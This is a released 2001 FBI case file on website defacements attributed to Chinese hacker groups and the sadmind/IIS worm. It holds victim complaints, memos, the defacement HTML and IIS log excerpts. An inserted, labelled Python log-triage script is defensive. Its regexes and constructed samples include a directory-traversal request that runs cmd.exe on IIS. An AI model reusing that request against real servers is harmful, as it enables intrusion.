FEDERAL BUREAU OF INVESTIGATION


Date of transcription 05/11/2001 


[____], Janus Computer Systems, 900 Chapel Street, Suite 527, New Haven, Connecticut, [____], was advised of the identity of the interviewing agent and the nature of the interview. [____] provided the following information.


[____] Haven Chamber of Commerce website. The websites are gnhcc.com and newhavenchamber.com. The websites were defaced on May 6, 2001. [____] provided a copy of the logs regarding the defacement to SA [____]. The logs are on 3 1/2 disk and are attached in an FD340 1A envelope.


Investigation on [illegible] at New Haven, Connecticut


Date dictated 5/11/2001


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency;
it and its contents are not to be distributed outside your agency.
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b7E 


FD-71 (Rev. 3-27-95)
Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Subject's name and aliases: [____]
Character of case: [____]


Complainant: [____]   Protect Source


Complaint received
[ ] Personal [x] Telephonic   Date 05/03/2001   Time 1:00 pm


Address of Subject: [____]
Complainant's address and telephone number: 8 FJ Clarke Cir., Bethel [____]
(203) 778-4925 ext. [____]


Complainant's DOB; Scars, marks and other data; Employer; Address; Subject's Description; Vehicle Description: [not filled in]


Facts of Complaint


Complainant advised that his company, Starstruck, sells watch
batteries, tools and supplies over its website, www.star[illegible].
On 05/03/01 at approximately 4:00 a.m., the website was "hacked into" and
the homepage was changed to a black screen with red lettering that read,
"Fuck USA Government" and "Fuck poisonbox."


(Complaint received by) [____]   BLOCK STAMP

FD-71 (Rev. 3-27-95)
Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.


Indices: [ ] Negative [ ] See below

Subject's name and aliases: UNSUBS
Character of case: Computer Intrusion
Complainant: [____], DBA, CIDRA   Protect Source
Complaint received

[ ] Personal [XX] Telephonic   Date 05/18/01   Time 8:15 am

Address of Subject: [____]
Complainant's address and telephone number: 50 Barnes Industrial North, Wallingford, CT, [____]
Complainant's DOB: [____]   Sex: Male
Race; Height; Hair; Build; Birth date and birth place; Age; Weight; Eyes; Complexion; Social Security Number; Scars, marks and other data; Employer; Address; Telephone; Vehicle Description: [not filled in]


Facts of Complaint


[____], employed at CIDRA, an optical networking company, advised
that CIDRA's website, located at www.cidra.com, has been hacked into
twice, first on Wednesday evening and again last night. The "hacker"
altered the data that pops up when the visitor to the site clicks on a
link entitled optical sensing systems, an icon at the bottom right hand
corner of the web page. The message that the hacker inserted was
"Fuckusa.com" or "fuck usa.com". [____] does not believe that CIDRA
has suffered monetary damages due to the intrusion, but noted that
customers have encountered the message. He has logs which [illegible]
possible IP addresses from which the hacker might be operating. [____]
is uncertain whether the intrusion is from outside the company, or if one
of the approximate 370 employees of CIDRA might be responsible.
CIDRA is working on security measures to protect its website but
remains vulnerable for the time being to additional intrusions.

[____] requested any assistance the FBI might be able to
provide to identify the offender.


Do not write in this space.
[handwritten note, illegible]


(Complaint received by) [____]
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/25/2001


[____], [____] Barnes Industrial North, Wallingford, Connecticut, was advised of the identity of the interviewing agent and the nature of the interview. [____] provided the following information.


CIDRA's websites are cidra.com and cidrasensors.com and
were defaced on May 16, 2001. [____] e-mailed a copy of the logs
regarding the defacement to SA [____]. The logs have been saved
to CD-R and are attached in an FD340 1A envelope.


Investigation on 5/25/2001 at New Haven, Connecticut
File # [____]   Date dictated 5/25/2001
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ie 


FEDERAL BUREAU OF INVESTIGATION


Date of transcription 05/8/2001


[____], Command Technology Inc., 404 Thames Street,
Groton, Connecticut, was advised of the identity of
the interviewing agent and the nature of the interview. [____]
provided the following information.


[____] of Command Technology Inc.,
which is a company that provides online access to manuals and
service bulletins regarding aircraft repair. Command Technology
has contracts involving the United States Government and Sikorsky
Aircraft.


Command Technology's website is c2aircraft.com. The
website is password protected. It was defaced on May 6, 2001.
[____] e-mailed a copy of the logs regarding the defacement to SA
[____]. The logs have been saved to CD-R and are attached in an
FD340 1A envelope.


Investigation on 5/7/2001 at New Haven, Connecticut


Date dictated 5/8/2001
FD-302 (Rev. 10-6-95) 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/27/2001


[____], Prmsoft, 999 Oronoque Lane, Stratford, Connecticut
06614, Telephone 203-375-1684 ext. [____], telephonically contacted
Special Agent [____] to advise that their computer system at
prmsoft.com had the web pages defaced.


His company develops software for the long term health
care industry. They operate a Windows NT 4.0 system which is fully
patched. Sitting behind a Sonic firewall they have two web
servers, one with exchange mail and the other a test bed. Both of
the web servers were defaced with the same image, with the same
files altered and from the same site. The attack took place on May
5, 2001 at about 11:50 pm Eastern Daylight Time. The attacker used
HTTP commands to overwrite his index.html, index.asp, default.html
and default.asp files with the new files.


[____] furnished a copy of the [illegible], and the altered
files to SA [____] by e-mail to [____]. The e-mail and the
attached logs and altered files were saved to a zip drive. The
attachment, which had been sent zipped, was saved as both a zipped
and unzipped file.


Investigation on [illegible] at New Haven, Connecticut (telephonically)


File # [____]   Date dictated 05-27-01
by [____]
FD-71 (Rev. 3-27-95)
Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [ ] Negative [ ] See below


Subject's name and aliases: [____]
Character of case: Internet Fraud
66F-NH-C40399


Complainant: [____]   [ ] Protect Source
Syscon, Inc.
Glastonbury, CT


Complaint received
[ ] Personal [ ] Telephonic   Date 05/08/01   Time 10:20 a.m.


Address of Subject: [____]
Complainant's address and telephone number: 860-657-1370
Complainant's DOB; Scars, marks and other data; Subject's Description; Employer; Address; Telephone; Vehicle Description: [not filled in]


Facts of Complaint


Complainant, [____], called on behalf of his client. [____] is
employed by Syscon, Inc. (Syscon) located in Glastonbury, CT. Syscon
serves as the systems administrator for Temenos. Temenos is a brokerage
firm located at 195 Farmington Avenue, Farmington, CT.


Last night an Internet hacker hacked into Temenos' system and stole
customer profiles which contained sensitive client information to include
stock portfolios. The intruder also placed anti-government material and
profanity on Temenos' website.


Temenos utilizes a Microsoft website package and contracts Syscon to
provide administrative and security services. [____] at Temenos and [____]
informed Syscon of the incident. Complainant was provided with both
the FBI internet site, www.IFCCFBI.gov and the helpline telephone number,
1-800-257-3221. However, due to the sensitive nature of the
material which was taken by the hacker, [____] was interested in
filing a formal complaint with this office.


Should you have any additional questions regarding the
incident, [____] would be the person to contact since his client
(Temenos) is not as computer literate.


Do not write in this space.


(Complaint received by) [____]


(Rev. 10-01-1999)


FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE   Date: 05/25/2001


To: Chicago   Attn: SA [____]


New Haven


From: New Haven
Squad 10
Contact: SA [____]
Approved By:
Drafted By:
Case ID #: [____] (Pending)


Title: Hacker/Honker Union of China
Illinois Secretary of State
Intrusion
04/03/2001


Synopsis: To provide information and log files from Connecticut
victims.


Enclosure(s): 1) Original and one copy of an FD-302 for [____]
Command Technologies Inc. One CD-R containing logs
regarding the defacement. 2) Original and one copy of an FD-302
and FD-71 for [____] CIDRA. One CD-R containing logs
regarding the defacement. 3) Original and one copy of an FD-71
[____] Starstruckinc.com. 4) Original and one copy of
an FD-71 for [____] Syscon Inc. 5) Original and one copy
of an FD-302 for [____] Janus Computer Systems. One 3
1/2 disk containing logs regarding the defacement. 6) Original
and one copy of an FD-302 for [____] Greenfield Consulting
Group. One CD-R containing logs regarding the defacement. 7)
Original and one copy of an FD-302 [____] Prmsoft. One
zip disk containing logs regarding the defacement. 8) Original
and one copy of an FD-302 for [____] Americares. One CD-
R containing logs regarding the defacement. 9) Original and one
copy of an FD-71 [____] Subway Inc. One CD-R
containing logs regarding the defacement. 10) Original and one
copy of an FD-71 for [____] Milford Police Department, Milford,
Connecticut.


Details: New Haven Division has received numerous complaints
regarding website defacements appearing to be attributable to
Chinese hackers. The various victims have provided information
and log files regarding the defacements as detailed below.


To: Chicago   From: New Haven
Re: [____]   05/25/2001


1) On May 7, 2001 [____] Command Technologies Inc., 404
Thames Street, Groton, Connecticut, 06340, [____]
advised that their website c2aircraft.com had been defaced.
Command Technologies provided log information and a copy of the
defaced website which is on the enclosed CD-R.


2) On May 18, 2001, [____] CIDRA, 50 Barnes
Industrial North, Wallingford, Connecticut, [____]
advised that their website cidra.com had been defaced. [____]
provided log information and a copy of the defaced website which
is on the enclosed CD-R.


3) On May 3, 2001 [____] Starstruck, 8 FJ Clarke
Cir., Bethel, Connecticut, advised that their
website starstruckinc.com had been defaced. [____] advised that
no log information was available.


4) [____] Syscon Inc., [____] is the [____]
for Temenos Brokerage [____], [____] Farmington
Ave., Farmington, CT. [____] advised that Temenos
Brokerage Firm advised him that Temenos' computer system had been
compromised and sensitive client information including [illegible]
portfolios had been taken. Their website was also defaced. [____]
advised that no log information was available.


5) [____] Janus Computer Systems, (203) 562-
3333, Ext [____], [____] for the Greater New
Haven Chamber of Commerce website. [____] advised that the
websites gnhcc.com and newhavenchamber.com were defaced. A copy
of the logs is on the enclosed 3 1/2 disk.


6) [____] Greenfield Consulting Group, 274
Riverside Avenue, Westport, Connecticut, (203) 221-0411 ext [____],
advised that their website mail.greenfieldgroup.com had been
defaced. A copy of the logs regarding the defacement is on the
enclosed CD-R.


7) [____] Prmsoft, 999 Oronoque Lane, Stratford,
Connecticut, [____] advised that their website,
prmsoft.com, had been defaced. [____] provided a copy of the logs
regarding the defacement on the enclosed Zip disk.


8) [____] Americares, 161 Cherry Street, New
Canaan, Connecticut, [____] advised that their website,
Amercares.org, had been defaced. A copy of the logs regarding
the defacement is on the enclosed CD-R.


9) [____] Subway Inc., 325 Bic Drive, Milford,
Connecticut, [____] advised that a computer they
utilized at IP number 208.160.142.5 had been compromised and the
web page defaced. A copy of the logs regarding the defacement is
on the enclosed CD-R.


10) Captain [____], Milford Police Department,
Milford, Connecticut, advised that the city of
Milford's website had been defaced. [____] provided a printout of
the defacement. No logs were available.


No additional defacements have been reported to New
Haven by Connecticut victims. If any further complaints are
received they will be forwarded to Chicago.


Any questions should be directed to SA [____]
(203) 503-5024.
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/04/2001


[____], white male, date of birth [____],
Webmaster, Southwest Royalties Internet Service (SWRIS), 407
[illegible] 79701, work telephone numbers of [____],
was interviewed at his place of
employment by Special Agent [____]. After advising
[____] of the identity of the interviewing agent and the nature of
the interview, [____] provided the following information.


SWRIS began operations on 5/1/2001 and has a client base
of approximately 30 businesses related to the oil and gas industry.
According to [____], SWRIS is Microsoft Windows driven, uses Cisco
Routers, and has an ISA Server as part of their firewall setup.


On 5/8/2001, [____] was checking one of the SWRIS web
sites and discovered that the site had been replaced with the
following: "FUCK USA GOVERNMENT!" "FUCK POISON BOX!" Once [____]
determined that the web site had been defaced, [____] checked the
log files and determined, based on the file stamp, that the
defacement took place at 10:40 a.m. on 5/8/2001. [____] caught and
corrected the defacement at 11:00 a.m. on 5/8/2001. [____] made a
copy of the log files on to compact disc and a floppy disk. [____]
also printed a copy of the log file.


Since the attack, [____] has received a great deal of
port scans. Additionally, upon further review of the SWRIS system,
[____] was unable to determine whether the intrusion itself
compromised any of the client data bases.


Investigation on 5/14/2001 at Midland, Texas


Date dictated 6/4/2001
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b7c 


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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/04/2001


[____], white male, date of birth [____],
[____], GeoSpectrum, Inc. (GSI), 214 West Texas Avenue,
Suite 1000, Midland, Texas 79701, work telephone numbers of [____],
was interviewed at his place of employment by Special
Agent [____]. After advising [____] of the identity
of the interviewing agent and the nature of the interview, [____]
provided the following information.


According to [____], GSI is a small Internet Service
Provider (ISP) that carries a client base of approximately 1000.
GSI is an Oil related business that started an ISP as a division of
the company. On approximately 5/4/2001, GSI began receiving
complaints from system operators of multiple port scans on Port
111. GSI technicians located and killed suspicious files.
Additionally, GSI changed the root and passwords. On 5/6/2001, the
complaints persisted and GSI isolated three network servers and
implemented recovery of the "root" as the "root" was compromised.
After the servers were isolated, GSI installed security upgrades.
As part of the upgrades, GSI ordered a new Cisco Router, switch,
and firewall. Additionally, GSI was operating with a Sun Solaris
2.6 and upgraded the three servers to a Sun Solaris 8.0. [____]
was unable to save any logs related to the intrusion and
defacement. GSI technicians located two suspicious filenames
associated with the attack. The two filenames were "Sadminhack"
and "Uniattack."


Investigation on [illegible] at Midland, Texas


Date dictated 6/4/2001


SA [____]
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE   Date: 06/04/2001
To: Counterterrorism   Attn: NIP CLIU
SSA [____] Room 5965
Chicago   Attn: SA [____]
From: El Paso
Midland RA
Contact: SA [____] (915) 570-0255
Approved By:
Drafted By:
Case ID #: [____] (Pending)
Title: UNSUB(S);
GeoSpectrum, Inc. - Victim;
Southwest Royalties Internet Service - Victim;
Impairment - Web Page Defacement
Synopsis: Computer Intrusion and web page defacement of two (2)
ISPs.
Enclosure(s): For CG, One (1) Compact Disc containing e-mail
messages and log files and one (1) floppy disk containing log
files and printed log of intrusion into SWRIS, provided by [____].
One (1) original and one (1) copy of FD-302 interview of [____].
One (1) original and one (1) copy of FD-302 [____]
GSI.


Details: On 5/14/2001 [____], GSI,
advised that GSI had to take down three servers due to an
intrusion into the "root" and web page defacement. The intrusion
into the "root" and the web page defacement took place between
5/4/2001 and 5/6/2001. [____] was unable to provide any log
information regarding the intrusion and the web page defacement.
As a result of both, GSI has had to update their ISP security
with both new hardware and software.


On [____], [____] advised
that their system was compromised on 5/8/2001 with the defacement
of several web pages. [____] was able to repair the damage with
very little down-time to the server. [____] was able to provide
a compact disc containing the log files and e-mail messages.
[____] also provided an additional floppy disk with log files.


To: Counterterrorism   From: El Paso
Re: [____]   06/04/2001


Both [____] can be reached at the following:
Southwest Royalties Internet Service
407 North Big Spring
[illegible]
http://www.swris.com


[____]
214 West Texas Avenue, Suite 1000
Midland, Texas 79701


LEAD(s):
Set Lead 1: (Adm)
COUNTERTERRORISM


AT WASHINGTON, DC


Read and clear.
Set Lead 2: (Adm)
CHICAGO


AT CHICAGO, ILLINOIS


This information is provided to Chicago for any
investigative action deemed appropriate.
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE   Date: 06/04/2001
To: Chicago   Attn: Squad [____]
SA [____]
From: Memphis
Squad 5


Contact: SA [____] (902) 747-9656


Approved By:


Drafted By:


Title: Subject: Hacker/Honker Union of China
Victim: Illinois Secretary of State
Type: Intrusion
Date: 04/03/2001


Synopsis: To report discontinuance of lead regarding defacements
of First Tennessee Bank's Capital Markets web site.


Administrative: Ref telcall between SA [____] on May
8, 2001.


Details: For information of Chicago, SA [____] was telephonically
contacted by [____] of the Corporate Security Division of
First Tennessee Bank (FTB), Memphis, TN, during the first week of
May, 2001, and advised that one of the bank's web sites
(www.ftcem.com) had been defaced a couple of times since April 30,
2001. Grissom mentioned that personnel in FTB's Data Security
Division told him that person(s) responsible were the People's
Republic of China. The statement placed on their web site was,
"Fuck USA Government fuck PoizonBOx contact:
sysadmin@yahoo.com.cn".


On the afternoon of May 8, 2001, SAs [____] and
[____] ([____] Coordinator) met with officials from [____],
explained what information was needed (logs, IP
addresses) to submit for the investigation. During this meeting
it was learned that the bank had not done any IP traces and had
not retrieved any information from log records. They had merely
heard about recent intrusions by the Chinese and "assumed" this
is what happened to their web site. SAs asked
that FTB contact them when they obtained the log and/or other
relevant information.


To: Chicago   From: Memphis


On May 29, 2001, SA [____] again contacted FTB to
determine if they had obtained the requested information. [____]
advised on May 31, 2001, that FTB's review of the log
files found nothing of value. In fact, nothing at all was found
on FTB's logs. It appears that this particular web site was set
up outside of FTB's Data Security guidelines and that the Capital
Markets web site only had the manufacturer provided event logging
capabilities running at the time of the intrusions. [____]
could provide nothing further regarding the previously reported
intrusions. [____] advised this incident had caused FTB to
re-evaluate the security of their systems.


Inasmuch as FTB is unable to provide the necessary logs
and/or IP information to assist in an investigation at this time,
Memphis is discontinuing the lead previously set by Chicago until
such time as the appropriate information is received from FTB.


LEAD(s):
Set Lead 1: (Adm)
CHICAGO DIVISION


AT CHICAGO, IL


Read and clear.
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 5/25/01 


[ ] provided the following information concerning an intrusion into a PeopleSoft webpage on May 6, 2001:


Subject: RE: logs etc
Date: Thu, 24 May 2001 11:20:11 -0700
From: [ ]
To: [ ]

-----BEGIN PGP SIGNED MESSAGE-----

Hello [ ],


No worries. The logs are actually quite trivial in size, only one of the machines had logging turned on. It's basically just the IIS httpd log that will give you IP addresses of the machines that ran the worm against the host. The client didn't feel the need to encrypt them, so I guess sending them to you in the clear would be consistent with the client's wishes. The stuff is attached below.

I contacted all the ARIN listed owners of the IP addresses that were not clients and were attacking the webservers. Of the 4 non-client IP addresses FBI agents had visited two. One was an ISP, the other is a research group.


The most interesting entry in the logs is: 
2001-05-06 12:25:00 211.97.114.240 


That IP address belongs to: 
Unicom China 

911 Room,Xin Tong Center,No.8 Beijing Railway Station East Avenue, 
Beijing,PRC. 


Which is China's second largest phone company. Emails and calls to 
them were futile. 


Investigation on 5/25/01
Date dictated 5/25/01


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
Continuation of FD-302 of [ ], On 5/25/01, Page 4.

Cheers,

[ ]


The logs referred to in the e-mail have been copied to a disk and 
are contained in a 1A envelope in the case file. 
Complaint Form

NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [X] Negative [ ] See below

Subject's name and aliases: Unknown
Character of case: COMPUTER INTRUSION
Complainant: [ ], Deckare
Complaint received: [ ] Personal [X] Telephonic  Date 05/29/01  Time 0930
Complainant's address and telephone number: [ ] SW, Canton, Ohio
Sex: Male

Facts of Complaint:


[ ] telephonically contacted the Canton, Ohio office of the FBI regarding a computer intrusion in which his company, Deckare, had fallen victim to. [ ] advised that they noticed the hack on Sunday, May 6, 2001 at approximately midnight. The last login to the web site by a Deckare employee was Friday, May 4, 2001. [ ] indicated that unsub(s) hacked into their web site, www.deckare.com, and posted the phrases "fuck USA Government" and "fuck PoizonBOx". The intruders directed all responses to their hack to "sysadmcn@yahoo.com.cn".

[ ] advised that the [ ] for Deckare is [ ], who is employed by Netsolvers, telephone [ ], email address netsolvers@neo.rr.com.

Complaint received by: [ ]
AGENT COPY


FROM: DECKARE  May 29 2001 11:52AM  P4

fuck USA Government
fuck PoizonBOx
contact: sysadmcn@yahoo.com.cn


MAY-24-2001 THU 01:33 PM  HEALTH  FAX NO.

file://\\web/InetPub/wwwroot/hackindex.htm

fuck USA Government
fuck PoizonBOx

contact:sysadmcn@yahoo.com.cn

Page 1


MAY-24-2001 THU 01:33 PM  HEALTH  FAX NO.  P.03


<html>
<head>
<meta name="Microsoft Theme" content="behdl 100, default">
</head>
<body><br><br><br><br><br><br><table width="100%">
<tr>
<td><p align="center"><font size="7" color="red">fuck USA Government</font><tr><td><p align="center"><font size="7" color="red">fuck PoizonBOx</font><tr><td><p align="center"><font size="4" color="red">contact:sysadmcn@yahoo.com.cn</font>
</table>

Page 1

FD-71 (Rev. 3-27-95)
Complaint Form


NOTE: Hand print names legibly; handwriting satisfactory for remainder.
Indices: [X] Negative [ ] See below

Subject's name and aliases: Unknown
Character of case: COMPUTER INTRUSION
Complainant: [ ], Canton Health Department
Complaint received: [ ] Personal [X] Telephonic  Date 05/15/2001  Time 1:10 pm
Address of Subject: People's Republic of China
Complainant's address and telephone number: 420 Market Avenue, Canton, Ohio

Facts of Complaint:


[ ] telephonically contacted the Canton, Ohio office of the FBI regarding a computer intrusion in which the Canton Health Department had fallen victim to. On May 9, 2001, at approximately 7:01 p.m., unsub(s) hacked into and defaced the Health Department's web page as well as both of the Department's mirror sites which are used as back-up web sites. [ ] advised that the unsub(s) had to access each page separately through firewalls.

[ ] indicated that the file marked hackindex.htm was the file which replaced the Health Department's default home page while the file marked hackindex.asp was the underlying code that displays the hacked page. Both files were found on the Health Department's server when it was hacked. The messages left on the web sites by the unsub(s) all stated "fuck USA Government" and "fuck PoizonBOx". The unsub(s) responsible for the intrusion directed the victim to direct all inquiries concerning the intrusion to sysadmcn@yahoo.com.cn. [ ] knew such an address to be that of the Chinese American office for www.yahoo.com. The Health Department suffered approximately $1000.00 in losses (labor and equipment) as a result of the intrusion.

[ ] advised that their main web site address is www.cantonhealth.org while the two back-up sites are www.members.tripod.com/bchd and www.members.tripod.com/BCHD respectively.
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE  Date: 05/29/2001
To: Chicago  Attn: SA [ ]
    Counterterrorism  NIP
From: Cleveland
    Squad 10/Can
Drafted By: [ ]
Case ID #: [ ] (Pending)
Title: HACKER/HONKER UNION OF CHINA;
    ILLINOIS SECRETARY OF STATE-VICTIM;
    04/03/2001;
    COMPUTER INTRUSION


Synopsis: Forwarding of intelligence regarding web defacements. 


Enclosure(s): Enclosed for the Chicago Division are the 
following: 


1. A copy of the hacked web page (no logs available) 
for Deckare Services, 1501 Raff Road SW, Canton, Ohio. 


2. A copy of the hacked web page for the Canton Health 
Department, 420 Market Avenue North, Canton, Ohio as well as the 
corresponding logs for the attack. 


3. A copy of an FD-71 Complaint Form received from [ ], Canton Health Department.

4. A copy of an FD-71 Complaint Form received from [ ].

Details: For the information of the Chicago and Counterterrorism 
Divisions, the Canton RA, Cleveland Division, is in receipt of 
information from two local organizations who have been the victim 
of web defacements. The details of the computer intrusions seem 
to match those in captioned matter. 


Therefore, the enclosed FD-71's are being forwarded to 
the Chicago Division for incorporation into captioned matter. 


To: Chicago From: Cleveland
Re: [ ] 05/29/2001


LEAD (s): 
Set Lead 1: 
CHICAGO 
AT CHICAGO, ILLINOIS 
Read and clear. 
Set Lead 2: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE  Date: 05/24/2001
To: Chicago  Attn: SA [ ]
From: Detroit
    Squad C-12/[ ]
    Contact: SA [ ]
Approved By: [ ]
Drafted By: [ ]
Case ID #: [ ]
Title: Hacker/Honker Union of China;
    Chicago Systems Group - Victim
    Computer Intrusion
    04/03/01

    [ ]
    UNSUB(S);
    Journal of Clinical Investigation - Victim;
    Computer Intrusion


Synopsis: Forwarding all information pertaining to the use of 
the Sadminds/IIS worm against Journal of Clinical Investigation 
for Chicago’s coordination. Copy of information to Detroit 
Control file. 


Enclosures: For Chicago are: a 1-A envelope containing one (1) 
3.5" diskette with files obtained from victim; one FD-302 with 
attachments re interview with victim. For Detroit is one FD-302 
re victim interview. 


Details: On May 16, 2001, [ ], Journal of Clinical Investigation, 35 Research Dr, Suite 300, Ann Arbor, Michigan, contacted the Ann Arbor FBI to advise of a compromise of their web server. Following an interview with their [ ], it was evident that their systems had experienced the Sadminds/IIS worm. Pertinent files and logs were obtained.


SA [ ] is forwarding all pertinent information re the attack on the Journal of Clinical Investigation to captioned Chicago case, as well as a copy to the Detroit control file.


To: Chicago From: Detroit
Re: [ ] 05/24/2001

LEAD (s):
Set Lead 1: (Adm)
CHICAGO
AT CHICAGO

Read and clear.

FD-302 (Rev. 10-6-95)
FEDERAL BUREAU OF INVESTIGATION


Date of transcription 05/30/01 


On May 25, 2001, [ ], [ ] for the Journal of Clinical Investigation, 35 Research Drive, Suite 3200, Ann Arbor, Michigan, (734) 222-6050, was advised of the interviewing agent's identity and the purpose of the interview, and provided the following information:


[ ] advised that he discovered that their website, "www.the-jci.org", was altered on the morning of Monday, May 7, 2001. He immediately took their server offline and checked the IIS log files. He discovered some log entries that looked suspicious, but since his logging was set to "abbreviated", he could not display the entire command string to determine exactly what had happened.

[ ] checked the dates on some files and noticed that the "index.html", "index.asp", "default.html", and "default.asp" files had May 6, 2001 dates. He also found that the "roots.exe" file had been moved to another directory.

[ ] finished by stating that the IP address for the server is 63.146.80.3, that there was no firewall protecting the server, and they were running Microsoft Windows NT, version 5, unknown update level.

[ ] provided copies of the altered files listed above, as well as log files for May 5, 6, and 7, on a 3.5" diskette. This diskette has been placed in the 1-A section of this file.


Attached and made part hereto is a copy of the altered 
"index.html" file, as well as the May 5, 6, and 7 log files. 


Investigation on 05/25/01 at Ann Arbor, Michigan 


File # Date dictated 


by 


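An added example, not from the FBI file or any victim's tooling: Python that parses IIS W3C log lines using the #Fields layout the attached logs carry, counts the /scripts/root.exe and cmd.exe traversal requests per source address (the IPs the e-mail above pulled from the IIS httpd log), and reports whether cs-uri-query was logged, since with the "abbreviated" logging the JCI administrator described the command string cannot be recovered. The log lines and IP addresses in it are constructed.

```python
"""Triage IIS 4.0 W3C extended log lines for sadmind/IIS defacement traffic.

Added example, not part of the FBI file. Taken from the file: the #Fields layout
"time c-ip cs-method cs-uri-stem sc-status" and the stems /scripts/root.exe and
/scripts/../../winnt/system32/cmd.exe. The log lines below are constructed.
"""
import re
from collections import Counter, defaultdict

# Request stems that mark this worm in the attached logs: a traversal out of
# /scripts to cmd.exe, then the copied root.exe. The traversal is matched
# loosely so the decoded form in the scan and a raw encoded form both hit.
SIGNATURES = {
    "traversal-to-cmd": re.compile(r"^/scripts/.*winnt/system32/cmd\.exe$", re.I),
    "root-exe": re.compile(r"^/scripts/root\.exe$", re.I),
}


def parse_w3c(lines):
    """Yield one dict per entry, keyed by the names in the #Fields directive.

    Reading the names from the header lets the same parser handle the
    abbreviated layout in the file and a fuller one that has cs-uri-query.
    """
    fields = None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):  # #Software, #Version, #Date
            continue
        if fields is None:
            raise ValueError("log entry before #Fields directive")
        parts = line.split()
        if len(parts) != len(fields):  # truncated or garbled entry: skip it
            continue
        yield dict(zip(fields, parts))


def triage(lines):
    """Return (hits, query_logged).

    hits maps each client IP to a Counter of the signatures it triggered.
    query_logged is True only if the log carried cs-uri-query; without it
    (the "abbreviated" setting the JCI administrator described) the command
    string passed to cmd.exe cannot be recovered from the log at all.
    """
    hits = defaultdict(Counter)
    query_logged = False
    for entry in parse_w3c(lines):
        if "cs-uri-query" in entry:
            query_logged = True
        stem = entry.get("cs-uri-stem", "")
        for name, pattern in SIGNATURES.items():
            if pattern.search(stem):
                hits[entry["c-ip"]][name] += 1
    return dict(hits), query_logged


def commands_seen(lines):
    """Distinct cs-uri-query values sent with cmd.exe requests (empty if absent)."""
    seen = set()
    for entry in parse_w3c(lines):
        query = entry.get("cs-uri-query", "-")  # W3C logs write "-" for empty
        if query != "-" and SIGNATURES["traversal-to-cmd"].search(entry.get("cs-uri-stem", "")):
            seen.add(query)
    return seen


# Constructed sample in the abbreviated layout found on the victim server.
SAMPLE_ABBREVIATED = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-06 14:42:19
#Fields: time c-ip cs-method cs-uri-stem sc-status
14:42:19 198.51.100.7 GET /scripts/../../winnt/system32/cmd.exe 502
14:42:19 198.51.100.7 GET /scripts/root.exe 502
14:42:20 198.51.100.7 GET /scripts/root.exe 502
14:42:21 198.51.100.7 GET /scripts/root.exe 502
15:47:49 203.0.113.9 GET /exchange/USA/logon.asp 200
"""

# The same traffic as it would appear with cs-uri-query enabled (constructed).
SAMPLE_FULL = """\
#Fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status
14:42:19 198.51.100.7 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502
14:42:19 198.51.100.7 GET /scripts/root.exe - 502
"""

if __name__ == "__main__":
    for label, sample in (("abbreviated", SAMPLE_ABBREVIATED), ("full", SAMPLE_FULL)):
        hits, query_logged = triage(sample.splitlines())
        print(label, "cs-uri-query logged:", query_logged, dict(hits),
              "commands:", commands_seen(sample.splitlines()) or "not recoverable")
```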
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-06 14:42:19
#Fields: time c-ip cs-method cs-uri-stem sc-status
[entries before 15:47:49 are split across columns in the scan and illegible]
15:47:49 216.93.48.226 GET /exchange/USA/inbox/peerfldr.asp 200 
15:47:49 216.93.48.226 GET /exchange/USA/inbox/commands.asp 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/newmail.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/divider.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/newpost.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/inbox.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/delfoldr.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/upone.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/mark.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/urgent.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/mffav.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/arwtanrt.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/newfoldr.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/movepy.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/delmsg.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/papclip.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/flagcomp.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/empfldr.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/help.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/arwtanlf.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/envelope.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/papclip.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/refresh.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/envelope.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:48:08 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp
